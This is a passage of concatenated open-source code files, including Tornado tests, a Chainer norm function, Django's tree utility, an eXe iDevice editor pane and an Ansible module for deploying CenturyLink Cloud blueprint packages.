                before starting health checks on newly-created instances'''),
            Arg('--health-check-type', dest='HealthCheckType',
                choices=('EC2', 'ELB'),
                help='service to obtain health check status from'),
            Arg('-l', '--launch-configuration', dest='LaunchConfigurationName',
                metavar='LAUNCHCONFIG', help='''name of the launch
                configuration to use with the new group (required)'''),
            Arg('-M', '--max-size', dest='MaxSize', metavar='COUNT', type=int,
                help='maximum group size (required)'),
            Arg('-m', '--min-size', dest='MinSize', metavar='COUNT', type=int,
                help='minimum group size (required)'),
            Arg('--placement-group', dest='PlacementGroup',
                help='placement group in which to launch new instances'),
            Arg('--termination-policies', dest='TerminationPolicies.member',
                metavar='POLICY1,POLICY2,...', type=delimited_list(','),
                help='''ordered list of termination policies. The first has
                the highest precedence.'''),
            Arg('--vpc-zone-identifier', dest='VPCZoneIdentifier',
                metavar='ZONE1,ZONE2,...',
                help='''comma-separated list of subnet identifiers. If you
                specify availability zones as well, ensure the subnets'
                availability zones match the ones you specified'''),
            Arg('-z', '--availability-zones', dest='AvailabilityZones.member',
                metavar='ZONE1,ZONE2,...', type=delimited_list(','),
                help='''comma-separated list of availability zones for the new
                group (required unless subnets are supplied)''')]
| bsd-2-clause |
StealthMicro/OctoPi-Makerbot | env/Lib/site-packages/tornado/test/testing_test.py | 7 | 2208 | #!/usr/bin/env python
from __future__ import absolute_import, division, print_function, with_statement
from tornado import gen
from tornado.testing import AsyncTestCase, gen_test
from tornado.test.util import unittest
class AsyncTestCaseTest(AsyncTestCase):
    """Exercises AsyncTestCase's own wait()/timeout machinery."""
    def test_exception_in_callback(self):
        # An exception raised inside an IOLoop callback must surface from
        # wait() rather than being swallowed by the loop.
        self.io_loop.add_callback(lambda: 1 / 0)
        try:
            self.wait()
            self.fail("did not get expected exception")
        except ZeroDivisionError:
            pass
    def test_subsequent_wait_calls(self):
        """
        This test makes sure that a second call to wait()
        clears the first timeout.
        """
        # First wait is stopped by the 0.01s timeout; its 0.02s deadline must
        # not fire during the longer second wait.
        self.io_loop.add_timeout(self.io_loop.time() + 0.01, self.stop)
        self.wait(timeout=0.02)
        self.io_loop.add_timeout(self.io_loop.time() + 0.03, self.stop)
        self.wait(timeout=0.15)
class SetUpTearDownTest(unittest.TestCase):
    def test_set_up_tear_down(self):
        """
        This test makes sure that AsyncTestCase calls super methods for
        setUp and tearDown.
        InheritBoth is a subclass of both AsyncTestCase and
        SetUpTearDown, with the ordering so that the super of
        AsyncTestCase will be SetUpTearDown.
        """
        # Both helper classes append to this list to record call order.
        events = []
        result = unittest.TestResult()
        class SetUpTearDown(unittest.TestCase):
            def setUp(self):
                events.append('setUp')
            def tearDown(self):
                events.append('tearDown')
        class InheritBoth(AsyncTestCase, SetUpTearDown):
            def test(self):
                events.append('test')
        InheritBoth('test').run(result)
        # If AsyncTestCase failed to chain super().setUp()/tearDown(), the
        # 'setUp'/'tearDown' entries would be missing.
        expected = ['setUp', 'test', 'tearDown']
        self.assertEqual(expected, events)
class GenTest(AsyncTestCase):
    """Checks that @gen_test runs both sync and async test bodies to
    completion; tearDown asserts the body actually finished."""
    def setUp(self):
        super(GenTest, self).setUp()
        self.finished = False
    def tearDown(self):
        # Fails if the decorated test returned before reaching its last line.
        self.assertTrue(self.finished)
        super(GenTest, self).tearDown()
    @gen_test
    def test_sync(self):
        self.finished = True
    @gen_test
    def test_async(self):
        # Yield once through the IOLoop before finishing.
        yield gen.Task(self.io_loop.add_callback)
        self.finished = True
# Run the test suite when invoked as a script.
if __name__ == '__main__':
    unittest.main()
| agpl-3.0 |
AlpacaDB/chainer | chainer/functions/math/batch_l2_norm_squared.py | 4 | 1734 | import numpy
from chainer import cuda
from chainer import function
from chainer.utils import array
from chainer.utils import type_check
class BatchL2NormSquared(function.Function):
    """Per-sample squared L2 norm: sums x**2 over all non-batch axes."""
    def check_type_forward(self, in_types):
        type_check.expect(in_types.size() == 1)
        x_type, = in_types
        type_check.expect(
            x_type.dtype == numpy.float32,
            x_type.ndim >= 2,
        )
    def forward_cpu(self, inputs):
        # Flatten everything but the batch axis, then reduce each row.
        x = array.as_mat(inputs[0])
        return (x * x).sum(axis=1),
    def forward_gpu(self, inputs):
        x = array.as_mat(inputs[0])
        # Fused square-and-sum reduction over axis 1 in a single kernel.
        l2normsquared_kernel = cuda.cupy.ReductionKernel(
            'T x', 'T y', 'x * x', 'a + b', 'y = a', '0', 'l2normsquared'
        )
        return l2normsquared_kernel(x, axis=1),
    def backward(self, inputs, gy):
        x = inputs[0]
        xp = cuda.get_array_module(x)
        # d/dx sum(x^2) = 2x * gy; reshape gy so it broadcasts across the
        # flattened (non-batch) axes of x.
        gy0 = gy[0].reshape(-1, *((1,) * (x.ndim - 1)))
        if xp is numpy:
            gx = 2 * x * gy0
        else:
            kernel = cuda.elementwise(
                'T x, T gy', 'T gx', 'gx = 2 * x * gy',
                'l2normsquared_bwd')
            gx = kernel(x, gy0)
        return gx,
def batch_l2_norm_squared(x):
    """L2 norm (a.k.a. Euclidean norm) squared.
    This function implements the square of L2 norm on a vector. No reduction
    along batch axis is done.
    Args:
        x (~chainer.Variable): Input variable. The first dimension is assumed
            to be the *minibatch dimension*. If x has more than two dimensions
            all but the first dimension are flattened to one dimension.
    Returns:
        ~chainer.Variable: Two dimensional output variable.
    """
    # Stateless Function: a fresh instance per call is fine.
    return BatchL2NormSquared()(x)
| mit |
andim27/magiccamp | build/lib/django/utils/tree.py | 310 | 5778 | """
A class for storing a tree graph. Primarily used for filter constructs in the
ORM.
"""
from django.utils.copycompat import deepcopy
class Node(object):
    """
    A single internal node in the tree graph. A Node should be viewed as a
    connection (the root) with the children being either leaf nodes or other
    Node instances.
    """
    # Standard connector type. Clients usually won't use this at all and
    # subclasses will usually override the value.
    default = 'DEFAULT'
    def __init__(self, children=None, connector=None, negated=False):
        """
        Constructs a new Node. If no connector is given, the default will be
        used.
        Warning: You probably don't want to pass in the 'negated' parameter. It
        is NOT the same as constructing a node and calling negate() on the
        result.
        """
        # Shallow-copy so the caller's list is never shared with this node
        # (py2-era and/or idiom for: children[:] if children else []).
        self.children = children and children[:] or []
        self.connector = connector or self.default
        self.subtree_parents = []
        self.negated = negated
    # We need this because of django.db.models.query_utils.Q. Q. __init__() is
    # problematic, but it is a natural Node subclass in all other respects.
    def _new_instance(cls, children=None, connector=None, negated=False):
        """
        This is called to create a new instance of this class when we need new
        Nodes (or subclasses) in the internal code in this class. Normally, it
        just shadows __init__(). However, subclasses with an __init__ signature
        that is not an extension of Node.__init__ might need to implement this
        method to allow a Node to create a new instance of them (if they have
        any extra setting up to do).
        """
        obj = Node(children, connector, negated)
        obj.__class__ = cls
        return obj
    # Pre-decorator-syntax equivalent of @classmethod.
    _new_instance = classmethod(_new_instance)
    def __str__(self):
        if self.negated:
            return '(NOT (%s: %s))' % (self.connector, ', '.join([str(c) for c
                    in self.children]))
        return '(%s: %s)' % (self.connector, ', '.join([str(c) for c in
                self.children]))
    def __deepcopy__(self, memodict):
        """
        Utility method used by copy.deepcopy().
        """
        obj = Node(connector=self.connector, negated=self.negated)
        obj.__class__ = self.__class__
        obj.children = deepcopy(self.children, memodict)
        obj.subtree_parents = deepcopy(self.subtree_parents, memodict)
        return obj
    def __len__(self):
        """
        The size of a node if the number of children it has.
        """
        return len(self.children)
    def __nonzero__(self):
        """
        For truth value testing.
        """
        # Python 2 truthiness hook: a node is truthy iff it has children.
        return bool(self.children)
    def __contains__(self, other):
        """
        Returns True is 'other' is a direct child of this instance.
        """
        return other in self.children
    def add(self, node, conn_type):
        """
        Adds a new node to the tree. If the conn_type is the same as the root's
        current connector type, the node is added to the first level.
        Otherwise, the whole tree is pushed down one level and a new root
        connector is created, connecting the existing tree and the new node.
        """
        if node in self.children and conn_type == self.connector:
            return
        if len(self.children) < 2:
            self.connector = conn_type
        if self.connector == conn_type:
            # Flatten compatible subtrees instead of nesting them.
            if isinstance(node, Node) and (node.connector == conn_type or
                    len(node) == 1):
                self.children.extend(node.children)
            else:
                self.children.append(node)
        else:
            # Push the current tree down one level under a new root connector.
            obj = self._new_instance(self.children, self.connector,
                    self.negated)
            self.connector = conn_type
            self.children = [obj, node]
    def negate(self):
        """
        Negate the sense of the root connector. This reorganises the children
        so that the current node has a single child: a negated node containing
        all the previous children. This slightly odd construction makes adding
        new children behave more intuitively.
        Interpreting the meaning of this negate is up to client code. This
        method is useful for implementing "not" arrangements.
        """
        self.children = [self._new_instance(self.children, self.connector,
                not self.negated)]
        self.connector = self.default
    def start_subtree(self, conn_type):
        """
        Sets up internal state so that new nodes are added to a subtree of the
        current node. The conn_type specifies how the sub-tree is joined to the
        existing children.
        """
        if len(self.children) == 1:
            self.connector = conn_type
        elif self.connector != conn_type:
            self.children = [self._new_instance(self.children, self.connector,
                    self.negated)]
            self.connector = conn_type
            self.negated = False
        # Save the current node state on the stack and start with a clean
        # child list; end_subtree() pops and re-attaches it.
        self.subtree_parents.append(self.__class__(self.children,
                self.connector, self.negated))
        self.connector = self.default
        self.negated = False
        self.children = []
    def end_subtree(self):
        """
        Closes off the most recently unmatched start_subtree() call.
        This puts the current state into a node of the parent tree and returns
        the current instances state to be the parent.
        """
        obj = self.subtree_parents.pop()
        node = self.__class__(self.children, self.connector)
        self.connector = obj.connector
        self.negated = obj.negated
        self.children = obj.children
        self.children.append(node)
| bsd-3-clause |
RichDijk/eXe | exe/webui/editorpane.py | 1 | 19032 | # ===========================================================================
# eXe
# Copyright 2004-2006, University of Auckland
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
# ===========================================================================
"""
The EditorPane is responsible for creating new idevice
"""
import logging
from exe.webui import common
from exe.engine.field import TextField, TextAreaField, ImageField, FlashField
from exe.engine.field import FeedbackField, MultimediaField, AttachmentField
from exe.webui.editorelement import TextEditorElement
from exe.webui.editorelement import TextAreaEditorElement
from exe.webui.editorelement import ImageEditorElement
from exe.webui.editorelement import FeedbackEditorElement
from exe.webui.editorelement import FlashEditorElement
from exe.webui.editorelement import MultimediaEditorElement
from exe.webui.editorelement import AttachmentEditorElement
from exe.engine.idevice import Idevice
from exe.engine.genericidevice import GenericIdevice
from exe.engine.path import Path
from exe.engine.translate import lateTranslate
from exe import globals as G
log = logging.getLogger(__name__)
# ===========================================================================
class EditorPane(object):
    """
    The EditorPane is responsible for creating new idevice
    """
    def __init__(self, webServer, parent):
        """
        Initialize
        JR: added parent so we can access some attributes of the editor page,
        specifically showHide
        """
        self.ideviceStore = webServer.application.ideviceStore
        self.webDir = webServer.application.config.webDir
        self.styles = webServer.application.config.styleStore.getStyles()
        self.elements = []
        # The idevice currently being built/edited; originalIdevice keeps the
        # pristine copy so "cancel" can restore it.
        self.idevice = GenericIdevice("", "", "", "", "")
        self.idevice.id = self.ideviceStore.getNewIdeviceId()
        self.originalIdevice = GenericIdevice("", "", "", "", "")
        self.purpose = ""
        self.tip = ""
        self.message = ""
        self.parent = parent
        self._nameInstruc = \
            x_(u"Your new iDevice will appear in the iDevice "
               u"pane with this title. This is a compulsory field "
               u"and you will be prompted to enter a label if you try "
               u"to submit your iDevice without one.")
        self._authorInstruc = x_(u"This is an optional field.")
        self._purposeInstruc = x_(u"The purpose dialogue allows you to describe"
                                  u" your intended purpose of the iDevice to other"
                                  u" potential users.")
        self._emphasisInstruc = x_(u"Use this pulldown to select whether or not "
                                   u" the iDevice should have any formatting "
                                   u" applied to it to distinguish "
                                   u"it; ie. a border and an icon.")
        self._tipInstruc = x_(u"Use this field to describe "
                              u"your intended use and the pedagogy behind "
                              u"the device's development. This can be useful "
                              u"if your iDevice is to be exported for others "
                              u"to use.")
        self._lineInstruc = x_(u"Add a single text line to an iDevice. "
                               u"Useful if you want the ability to place a "
                               u"label within the iDevice.")
        self._textBoxInstruc = x_(u"Add a text entry box to an iDevice. "
                                  u"Used for entering larger amounts of textual "
                                  u"content.")
        self._feedbackInstruc = x_(u"Add an interactive feedback field to your iDevice.")
        self._flashInstruc = x_(u"Add a flash video to your iDevice.")
        self._mp3Instruc = x_(u"Add an mp3 file to your iDevice.")
        self._attachInstruc = x_(u"Add an attachment file to your iDevice.")
        self.style = self.styles[0]
    # Properties
    nameInstruc = lateTranslate('nameInstruc')
    authorInstruc = lateTranslate('authorInstruc')
    purposeInstruc = lateTranslate('purposeInstruc')
    emphasisInstruc = lateTranslate('emphasisInstruc')
    tipInstruc = lateTranslate('tipInstruc')
    lineInstruc = lateTranslate('lineInstruc')
    textBoxInstruc = lateTranslate('textBoxInstruc')
    feedbackInstruc = lateTranslate('feedbackInstruc')
    flashInstruc = lateTranslate('flashInstruc')
    mp3Instruc = lateTranslate('mp3Instruc')
    attachInstruc = lateTranslate('attachInstruc')
    def setIdevice(self, idevice):
        """
        Sets the iDevice to edit
        """
        # Work on a clone (same id) so cancel can restore the original.
        self.idevice = idevice.clone()
        self.idevice.id = idevice.id
        self.originalIdevice = idevice
    def process(self, request, status):
        """
        Process
        """
        log.debug("process " + repr(request.args))
        self.message = ""
        # "old" status: apply submitted form values to the in-progress edit.
        if status == "old":
            for element in self.elements:
                element.process(request)
            if "title" in request.args:
                self.idevice.title = unicode(request.args["title"][0], 'utf8')
            if "tip" in request.args:
                self.idevice.tip = unicode(request.args["tip"][0], 'utf8')
            if "emphasis" in request.args:
                self.idevice.emphasis = int(request.args["emphasis"][0])
                if self.idevice.emphasis == 0:
                    self.idevice.icon = ""
        # Each "addXxx" button appends a new field of that type.
        if "addText" in request.args:
            field = TextField(_(u"Enter the label here"),
                              _(u"Enter instructions for completion here"))
            field.setIDevice(self.idevice)
            self.idevice.addField(field)
            self.idevice.edit = True
        if "addTextArea" in request.args:
            field = TextAreaField(_(u"Enter the label here"),
                                  _(u"Enter the instructions for completion here"))
            field.setIDevice(self.idevice)
            self.idevice.addField(field)
            self.idevice.edit = True
        if "addFeedback" in request.args:
            field = FeedbackField(_(u"Enter the label here"),
                                  _(u"""Feedback button will not appear if no
                                  data is entered into this field."""))
            field.setIDevice(self.idevice)
            self.idevice.addField(field)
            self.idevice.edit = True
        #if "addFlash" in request.args:
            #print "add a flash"
            #field = FlashField(_(u"Enter the label here"),
            #_(u"Enter the instructions for completion here"))
            #field.setIDevice(self.idevice)
            #self.idevice.addField(field)
        if "addMP3" in request.args:
            field = MultimediaField(_(u"Enter the label here"),
                                    _(u"Enter the instructions for completion here"))
            field.setIDevice(self.idevice)
            self.idevice.addField(field)
            # The MP3 player flash asset must ship with the idevice.
            if not 'xspf_player.swf' in self.idevice.systemResources:
                self.idevice.systemResources += ['xspf_player.swf']
            self.idevice.edit = True
        if "addAttachment" in request.args:
            field = AttachmentField(_(u"Enter the label here"),
                                    _(u"Enter the instructions for completion here"))
            field.setIDevice(self.idevice)
            self.idevice.addField(field)
            self.idevice.edit = True
        if ("action" in request.args and
            request.args["action"][0] == "selectIcon"):
            self.idevice.icon = request.args["object"][0]
        if "preview" in request.args:
            # A title is compulsory before the idevice may be previewed.
            if self.idevice.title == "":
                self.message = _("Please enter<br />an idevice name.")
            else:
                self.idevice.edit = False
        if "edit" in request.args:
            self.idevice.edit = True
        if "cancel" in request.args:
            # Throw away in-progress edits; restore the saved original.
            ideviceId = self.idevice.id
            self.idevice = self.originalIdevice.clone()
            self.idevice.id = ideviceId
            self.parent.showHide = False
        if ("action" in request.args and
            request.args["action"][0] == "changeStyle"):
            self.style = self.styles[int(request.args["object"][0])]
        self.__buildElements()
    def __buildElements(self):
        """
        Building up element array
        """
        self.elements = []
        # Maps each field type to the editor element that renders it.
        elementTypeMap = {TextField: TextEditorElement,
                          TextAreaField: TextAreaEditorElement,
                          ImageField: ImageEditorElement,
                          FeedbackField: FeedbackEditorElement,
                          MultimediaField: MultimediaEditorElement,
                          FlashField: FlashEditorElement,
                          AttachmentField: AttachmentEditorElement}
        for field in self.idevice.fields:
            elementType = elementTypeMap.get(field.__class__)
            if elementType:
                # Create an instance of the appropriate element class
                log.debug(u"createElement "+elementType.__class__.__name__+
                          u" for "+field.__class__.__name__)
                self.elements.append(elementType(field))
            else:
                log.error(u"No element type registered for " +
                          field.__class__.__name__)
    def renderButtons(self, request):
        """
        Render the idevice being edited
        """
        html = "<font color=\"red\"><b>"+self.message+"</b></font>"
        html += "<fieldset><legend><b>" + _("Add Field")+ "</b></legend>"
        html += common.submitButton("addText", _("Text Line"))
        html += common.elementInstruc(self.lineInstruc) + "<br/>"
        html += common.submitButton("addTextArea", _("Text Box"))
        html += common.elementInstruc(self.textBoxInstruc) + "<br/>"
        html += common.submitButton("addFeedback", _("Feedback"))
        html += common.elementInstruc(self.feedbackInstruc) + "<br/>"
        # Attachments are now embeddable:
        #html += common.submitButton("addAttachment", _("Attachment"))
        #html += common.elementInstruc(self.attachInstruc) + "<br/>"
        # MP3 fields are now embeddable:
        #html += common.submitButton("addMP3", _("MP3"))
        #html += common.elementInstruc(self.mp3Instruc) + "<br/>"
        html += "</fieldset>\n"
        html += "<fieldset><legend><b>" + _("Actions") + "</b></legend>"
        if self.idevice.edit:
            html += common.submitButton("preview", _("Preview"), not self.parent.isGeneric)
        else:
            html += common.submitButton("edit", _("Edit"))
        html += "<br/>"
        html += common.submitButton("cancel", _("Cancel"))
        #html += "</fieldset>"
        return html
    def renderIdevice(self, request):
        """
        Returns an XHTML string for rendering the new idevice
        """
        html = "<div id=\"editorWorkspace\">\n"
        html += "<script type=\"text/javascript\">\n"
        html += "<!--\n"
        # Inline JS helpers drive the shared contentForm submit plumbing.
        html += """
            function submitLink(action, object, changed)
            {
                var form = document.getElementById("contentForm")
                form.action.value = action;
                form.object.value = object;
                form.isChanged.value = changed;
                form.submit();
            }\n"""
        html += """
            function submitIdevice()
            {
                var form = document.getElementById("contentForm")
                if (form.ideviceSelect.value == "newIdevice")
                    form.action.value = "newIdevice"
                else
                    form.action.value = "changeIdevice"
                form.object.value = form.ideviceSelect.value;
                form.isChanged.value = 1;
                form.submit();
            }\n"""
        html += """
            function submitStyle()
            {
                var form = document.getElementById("contentForm")
                form.action.value = "changeStyle";
                form.object.value = form.styleSelect.value;
                form.isChanged.value = 0;
                form.submit();
            }\n"""
        html += "//-->\n"
        html += "</script>\n"
        # Escape newlines so purpose/tip can be embedded in JS strings.
        self.purpose = self.idevice.purpose.replace("\r", "")
        self.purpose = self.purpose.replace("\n","\\n")
        self.tip = self.idevice.tip.replace("\r", "")
        self.tip = self.tip.replace("\n","\\n")
        if self.idevice.edit:
            html += "<b>" + _("Name") + ": </b>\n"
            html += common.elementInstruc(self.nameInstruc) + "<br/>"
            html += '<input type="text" name= "title" id="title" value="%s"/>' % self.idevice.title
            this_package = None
            html += common.formField('richTextArea', this_package,
                                     _(u"Pedagogical Tip"),'tip',
                                    '', self.tipInstruc, self.tip)
            html += "<b>" + _("Emphasis") + ":</b> "
            html += "<select onchange=\"submit();\" name=\"emphasis\">\n"
            emphasisValues = {Idevice.NoEmphasis: _(u"No emphasis"),
                              Idevice.SomeEmphasis: _(u"Some emphasis")}
            for value, description in emphasisValues.items():
                html += "<option value=\""+unicode(value)+"\" "
                if self.idevice.emphasis == value:
                    html += "selected "
                html += ">" + description + "</option>\n"
            html += "</select> \n"
            html += common.elementInstruc(self.emphasisInstruc)
            html += "<br/><br/>\n"
            # Icon selection is only meaningful when emphasis is applied.
            if self.idevice.emphasis > 0:
                html += self.__renderStyles() + " "
                html += u'<a href="#" '
                html += u'onmousedown="Javascript:updateCoords(event);"\n'
                html += u'onclick="Javascript:showMe(\'iconpanel\', 350, 100);">'
                html += u'Select an icon:</a> \n'
                icon = self.idevice.icon
                if icon != "":
                    html += '<img align="middle" '
                    html += 'src="/style/%s/icon_%s' % (self.style.get_dirname(), icon)
                    html += '.gif"/><br/>'
                html += u'<div id="iconpanel" style="display:none; z-index:99;">'
                html += u'<div style="float:right;" >\n'
                html += u'<img alt="%s" ' % _("Close")
                html += u'src="/images/stock-stop.png" title="%s"\n' % _("Close")
                html += u'onmousedown="Javascript:hideMe();"/></div><br/> \n'
                html += u'<div align="center"><b>%s:</b></div><br/>' % _("Icons")
                html += self.__renderIcons()
                html += u'</div><br/>\n'
            for element in self.elements:
                html += element.renderEdit()
        else:
            # Preview mode: render the read-only view plus pedagogy popup.
            html += "<b>" + self.idevice.title + "</b><br/><br/>"
            for element in self.elements:
                html += element.renderPreview()
            if self.idevice.purpose != "" or self.idevice.tip != "":
                html += "<a title=\""+_("Pedagogical Help")+"\" "
                html += "onmousedown=\"Javascript:updateCoords(event);\" \n"
                html += "onclick=\"Javascript:showMe('phelp', 380, 240);\" \n"
                html += "href=\"Javascript:void(0)\" style=\"cursor:help;\">\n "
                html += '<img alt="%s" src="/images/info.png" border="0" \n' % _('Info')
                html += "align=\"middle\" /></a>\n"
                html += "<div id=\"phelp\" style=\"display:none;\">\n"
                html += "<div style=\"float:right;\" "
                html += '<img alt="%s" src="/images/stock-stop.png" \n' % _('Close')
                html += " title='"+_("Close")+"' border='0' align='middle' \n"
                html += "onmousedown=\"Javascript:hideMe();\"/></div>\n"
                if self.idevice.purpose != "":
                    html += "<b>Purpose:</b><br/>%s<br/>" % self.purpose
                if self.idevice.tip != "":
                    html += "<b>Tip:</b><br/>%s<br/>" % self.idevice.tip
                html += "</div>\n"
        html += "</div>\n"
        self.message = ""
        return html
    def __renderStyles(self):
        """
        Return xhtml string for rendering styles select
        """
        html = '<select onchange="submitStyle();" name="styleSelect">\n'
        idx = 0
        for style in self.styles:
            html += "<option value='%d' " % idx
            if self.style.get_name() == style.get_name():
                html += "selected "
            html += ">" + style.get_name() + "</option>\n"
            idx = idx + 1
        html += "</select> \n"
        return html
    def __renderIcons(self):
        """
        Return xhtml string for displaying all icons
        """
        # Icons are the style directory's icon_*.gif files.
        iconpath = self.style.get_style_dir()
        iconfiles = iconpath.files("icon_*")
        html = ""
        for iconfile in iconfiles:
            iconname = iconfile.namebase
            icon = iconname.split("_", 1)[1]
            filename = "/style/%s/%s.gif" % (self.style.get_dirname(), iconname)
            html += u'<div style="float:left; text-align:center; width:80px;\n'
            html += u'margin-right:10px; margin-bottom:10px" > '
            html += u'<img src="%s" \n' % filename
            html += u' alt="%s" ' % _("Submit")
            html += u"onclick=\"submitLink('selectIcon','%s',1)\">\n" % icon
            html += u'<br/>%s.gif</div>\n' % icon
        return html
# ===========================================================================
| gpl-2.0 |
sestrella/ansible | lib/ansible/modules/cloud/centurylink/clc_blueprint_package.py | 21 | 10274 | #!/usr/bin/python
#
# Copyright (c) 2015 CenturyLink
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
module: clc_blueprint_package
short_description: deploys a blue print package on a set of servers in CenturyLink Cloud.
description:
- An Ansible module to deploy blue print package on a set of servers in CenturyLink Cloud.
version_added: "2.0"
options:
server_ids:
description:
- A list of server Ids to deploy the blue print package.
required: True
package_id:
description:
- The package id of the blue print.
required: True
package_params:
description:
- The dictionary of arguments required to deploy the blue print.
default: {}
required: False
state:
description:
- Whether to install or uninstall the package. Currently it supports only "present" for install action.
required: False
default: present
choices: ['present']
wait:
description:
- Whether to wait for the tasks to finish before returning.
type: bool
default: True
required: False
requirements:
- python = 2.7
- requests >= 2.5.0
- clc-sdk
author: "CLC Runner (@clc-runner)"
notes:
- To use this module, it is required to set the below environment variables which enables access to the
Centurylink Cloud
- CLC_V2_API_USERNAME, the account login id for the centurylink cloud
- CLC_V2_API_PASSWORD, the account password for the centurylink cloud
- Alternatively, the module accepts the API token and account alias. The API token can be generated using the
CLC account login and password via the HTTP api call @ https://api.ctl.io/v2/authentication/login
- CLC_V2_API_TOKEN, the API token generated from https://api.ctl.io/v2/authentication/login
- CLC_ACCT_ALIAS, the account alias associated with the centurylink cloud
- Users can set CLC_V2_API_URL to specify an endpoint for pointing to a different CLC environment.
'''
EXAMPLES = '''
# Note - You must set the CLC_V2_API_USERNAME And CLC_V2_API_PASSWD Environment variables before running these examples
- name: Deploy package
clc_blueprint_package:
server_ids:
- UC1TEST-SERVER1
- UC1TEST-SERVER2
package_id: 77abb844-579d-478d-3955-c69ab4a7ba1a
package_params: {}
'''
RETURN = '''
server_ids:
description: The list of server ids that are changed
returned: success
type: list
sample:
[
"UC1TEST-SERVER1",
"UC1TEST-SERVER2"
]
'''
__version__ = '${version}'
import os
import traceback
from distutils.version import LooseVersion
REQUESTS_IMP_ERR = None
try:
import requests
except ImportError:
REQUESTS_IMP_ERR = traceback.format_exc()
REQUESTS_FOUND = False
else:
REQUESTS_FOUND = True
#
# Requires the clc-python-sdk.
# sudo pip install clc-sdk
#
CLC_IMP_ERR = None
try:
import clc as clc_sdk
from clc import CLCException
except ImportError:
CLC_IMP_ERR = traceback.format_exc()
CLC_FOUND = False
clc_sdk = None
else:
CLC_FOUND = True
from ansible.module_utils.basic import AnsibleModule, missing_required_lib
class ClcBlueprintPackage:
clc = clc_sdk
module = None
    def __init__(self, module):
        """
        Construct module

        :param module: the AnsibleModule wrapping this task's parameters.
        Fails the task immediately if the clc-sdk or a sufficiently recent
        requests library is not installed.
        """
        self.module = module
        if not CLC_FOUND:
            self.module.fail_json(msg=missing_required_lib('clc-sdk'), exception=CLC_IMP_ERR)
        if not REQUESTS_FOUND:
            self.module.fail_json(msg=missing_required_lib('requests'), exception=REQUESTS_IMP_ERR)
        # clc-sdk requires requests >= 2.5.0.
        if requests.__version__ and LooseVersion(
                requests.__version__) < LooseVersion('2.5.0'):
            self.module.fail_json(
                msg='requests library version should be >= 2.5.0')
        self._set_user_agent(self.clc)
    def process_request(self):
        """
        Process the request - Main Code Path
        :return: Returns with either an exit_json or fail_json
        """
        p = self.module.params
        changed = False
        changed_server_ids = []
        self._set_clc_credentials_from_env()
        server_ids = p['server_ids']
        package_id = p['package_id']
        package_params = p['package_params']
        state = p['state']
        # 'present' is currently the only supported state (see argument spec).
        if state == 'present':
            changed, changed_server_ids, request_list = self.ensure_package_installed(
                server_ids, package_id, package_params)
            self._wait_for_requests_to_complete(request_list)
        self.module.exit_json(changed=changed, server_ids=changed_server_ids)
@staticmethod
def define_argument_spec():
"""
This function defines the dictionary object required for
package module
:return: the package dictionary object
"""
argument_spec = dict(
server_ids=dict(type='list', required=True),
package_id=dict(required=True),
package_params=dict(type='dict', default={}),
wait=dict(default=True),
state=dict(default='present', choices=['present'])
)
return argument_spec
def ensure_package_installed(self, server_ids, package_id, package_params):
"""
Ensure the package is installed in the given list of servers
:param server_ids: the server list where the package needs to be installed
:param package_id: the blueprint package id
:param package_params: the package arguments
:return: (changed, server_ids, request_list)
changed: A flag indicating if a change was made
server_ids: The list of servers modified
request_list: The list of request objects from clc-sdk
"""
changed = False
request_list = []
servers = self._get_servers_from_clc(
server_ids,
'Failed to get servers from CLC')
for server in servers:
if not self.module.check_mode:
request = self.clc_install_package(
server,
package_id,
package_params)
request_list.append(request)
changed = True
return changed, server_ids, request_list
def clc_install_package(self, server, package_id, package_params):
"""
Install the package to a given clc server
:param server: The server object where the package needs to be installed
:param package_id: The blue print package id
:param package_params: the required argument dict for the package installation
:return: The result object from the CLC API call
"""
result = None
try:
result = server.ExecutePackage(
package_id=package_id,
parameters=package_params)
except CLCException as ex:
self.module.fail_json(msg='Failed to install package : {0} to server {1}. {2}'.format(
package_id, server.id, ex.message
))
return result
def _wait_for_requests_to_complete(self, request_lst):
"""
Waits until the CLC requests are complete if the wait argument is True
:param request_lst: The list of CLC request objects
:return: none
"""
if not self.module.params['wait']:
return
for request in request_lst:
request.WaitUntilComplete()
for request_details in request.requests:
if request_details.Status() != 'succeeded':
self.module.fail_json(
msg='Unable to process package install request')
def _get_servers_from_clc(self, server_list, message):
"""
Internal function to fetch list of CLC server objects from a list of server ids
:param server_list: the list of server ids
:param message: the error message to raise if there is any error
:return the list of CLC server objects
"""
try:
return self.clc.v2.Servers(server_list).servers
except CLCException as ex:
self.module.fail_json(msg=message + ': %s' % ex)
def _set_clc_credentials_from_env(self):
"""
Set the CLC Credentials on the sdk by reading environment variables
:return: none
"""
env = os.environ
v2_api_token = env.get('CLC_V2_API_TOKEN', False)
v2_api_username = env.get('CLC_V2_API_USERNAME', False)
v2_api_passwd = env.get('CLC_V2_API_PASSWD', False)
clc_alias = env.get('CLC_ACCT_ALIAS', False)
api_url = env.get('CLC_V2_API_URL', False)
if api_url:
self.clc.defaults.ENDPOINT_URL_V2 = api_url
if v2_api_token and clc_alias:
self.clc._LOGIN_TOKEN_V2 = v2_api_token
self.clc._V2_ENABLED = True
self.clc.ALIAS = clc_alias
elif v2_api_username and v2_api_passwd:
self.clc.v2.SetCredentials(
api_username=v2_api_username,
api_passwd=v2_api_passwd)
else:
return self.module.fail_json(
msg="You must set the CLC_V2_API_USERNAME and CLC_V2_API_PASSWD "
"environment variables")
@staticmethod
def _set_user_agent(clc):
if hasattr(clc, 'SetRequestsSession'):
agent_string = "ClcAnsibleModule/" + __version__
ses = requests.Session()
ses.headers.update({"Api-Client": agent_string})
ses.headers['User-Agent'] += " " + agent_string
clc.SetRequestsSession(ses)
def main():
    """Module entry point: build the AnsibleModule and run the request."""
    ansible_module = AnsibleModule(
        supports_check_mode=True,
        argument_spec=ClcBlueprintPackage.define_argument_spec(),
    )
    ClcBlueprintPackage(ansible_module).process_request()
